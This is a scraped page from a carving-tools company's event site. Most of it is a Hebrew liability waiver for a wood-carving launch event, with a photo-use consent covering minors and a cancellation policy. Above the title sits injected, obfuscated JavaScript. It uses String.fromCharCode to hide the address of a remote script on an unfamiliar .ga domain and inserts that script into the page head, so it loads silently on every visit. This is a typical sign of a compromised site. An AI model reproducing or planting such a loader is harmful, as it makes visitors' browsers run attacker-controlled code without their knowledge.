Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); launch-tos - Jerboa Carving Tools

אירוע השקת

JERBOA CARVING TOOLS

.תנאי ההרשמה לאירוע ההשקה

כתב ויתור ושיחרור מאחריות

 

  1. אני הנרשם מתכוון לבצע פעילות גילוף בעץ והשחזת סכיני גילוף הכוללת שימוש בכלי עבודה חדים, לרבות סכינים, גרזנים וכו', וזאת מרצוני החופשי ובדעה צלולה.
 1. מצב בריאותי וכושרי הגופני טובים ויציבים מכל בחינה, באופן המאפשר לי לקיים פעילות זו, והנני מתחייב/ת להודיע, באופן מידי, על כל בעיה רפואית, אם תהיה לי ו/או אם תתעורר במהלך שהותי במקום, אשר יהיה בה בכדי להשפיע על פעילותי . 
 2. אני מצהיר/ה כי אינני מצוי/ה תחת השפעת אלכוהול, סמים או תרופות מרשם, וכי לא אשתתף בפעילות מעשית של גילוף ,או אאחוז בכלי לביצוע פעולה כלשהי במהלך שהותי במקום אם וככל שלא אהיה כשיר/ה לחלוטין לבצעה .
 3. הנני מצהיר/ה כי בידי הציוד המתאים לפעילות.
 4. ברור לי לחלוטין כי הפעילות המתקיימת במקום כרוכה בסיכונים ניכרים, ועלולה אף לגרום לי נזק גופני, לרבות מקרי פציעה ואפילו מוות .
 5. קיבלתי הסברים מפורטים בטרם תחילת פעילותי במקום על הסיכונים הנובעים מהפעילות בו ,ובהיותי מודע/ת לכל הסיכונים הללו אני נוטל/ת על עצמי מרצון סיכונים אלה ובוחר/ת להשתתף בפעילות.
 6. לאור האמור בסעיף 6 לעיל הריני מקבל/ת על עצמי את האחריות המלאה לכל נזק אשר יגרם לי במהלך פעילותי במקום, ובהתאם לזאת אני לבדי אשא בתוצאות המלאות, הישירות ו/או העקיפות לכל נזק, לגוף ו/או לרכוש, אשר יגרם לי ו/או לאדם אחר כתוצאה מהפעילות במקום.
 7. הריני משחרר/ת בזאת מכל אחריות את מפעילי האירוע ומארגניו, כולם יחד וכל אחד לחוד, ואת המשתתפים עימי בפעילות ו/או מי מעובדי המקום כיום או בעתיד ו/או את המפרסמים ו/או נותני החסות לאירוע. כל אלו יקראו להלן, במאוחד: "אנשי האירוע") מכל אחריות ו/או חבות חוקית לנזק מסוג כלשהו שיגרם לי ו/או לאדם אחר כאמור לעיל, אף אם הנזק הינו תוצאה של ליווי ו/או הדרכה ו/או הנחיות לקויים אשר ניתנו לי במהלך פעילותי במקום.
 8. ביחס לאמור לעיל הנני מוותר/ת, ויתור מלא, סופי ומוחלט, על כל טענה ו/או זכות תביעה מכל סוג שהוא כלפי אנשי האירוע ונותני החסות בגין כל נזק/ים אשר יגרם/ו לי ו/או אגרום לצד ג' כתוצאה מפעילותי במקום ו/או בקשר אליה .
 9. הנני מתחייב/ת בזאת לשפות את אנשי האירוע ו/או מי מהם בגין כל סכום אותו יאלצו לשלם ו/או בגין כל חיוב בו יחויבו בקשר לנזק אשר ייגרם לי ו/או אשר אגרום לצד ג', לרבות הוצאות משפטיות ושכ"ט עו"ד ולרבות בגין תביעות מוטבים ותביעות של מוסדות רפואיים שונים, וזאת בתוך 7 ימים, לכל היותר, מיום התשלום ע"י אנשי האירוע ו/או מי מהם או מיום חיובם ,לפי המוקדם מביניהם.
 10. ידוע לי כי חתימתי על כתב ויתור ושחרור מאחריות זה הינו תנאי יסודי ועיקרי לכניסתי לפעילות במקום וכי אלמלא התחייבויותיי והצהרותיי האמורות לעיל לא היו אנשי האירוע מאפשרים לי להשתתף בפעילות בו, וכי קראתי את האמור בו בעיון, הבנתי את תוכנו וחתמתי עליו מרצוני החופשי והטוב ובדעה צלולה.
 11. הובהר לי כי החניה אך ורק ברח' האילנות או רח' דרך השדות ברציפי החניה המוסדרים- אין כניסה לרכבים לרח' המרגניות, ואני מתחייב לא להחנות את רכבי ברחוב המרגניות.

מתן זכות לשימוש בתמונות כולל ילדים ונוער שלא מלאו להם 18 שנה

הנני מאשר/ת בזה ונותנ/ת את הסכמתי לעשות כל שימוש בתמונות ו/או צילומי וידאו ו/או הקלטות קול שלי ו/או של ילדיי, אשר יצולמו במהלך פעילותינו בשטח "דרך הגינון" בכתובת – כפר סירקין, רחוב המרגניות 6, להלן:"מקום האירוע", לצורכי שיווק ופרסום בכל צורה ו/או אופן שייקבע על ידי המארגנים, לרבות פרסום בעיתונות הכתובה או בכל מדיה או פלטפורמת שידור אחרת, לרבות אינטרנט וסלולר,להלן:"השימוש".

אין לי ו/או לילדיי, ולא תהיינה לי ו/או לילדיי, כל דרישות ו/או טענות ו/או תביעות, כספיות ו/או אחרות, לרבות ומבלי לגרוע מכלליות האמור לעיל, פיצוי כספי בגין השימוש כאמור, על פי כל דין.

ביטול השתתפות

ביטולים יתאפשרו עד ל- 12/10/18 בניקוי 30% דמי ביטול. לא יתאפשר ביטול בהחזר כספי או אחר לאחר מועד זה.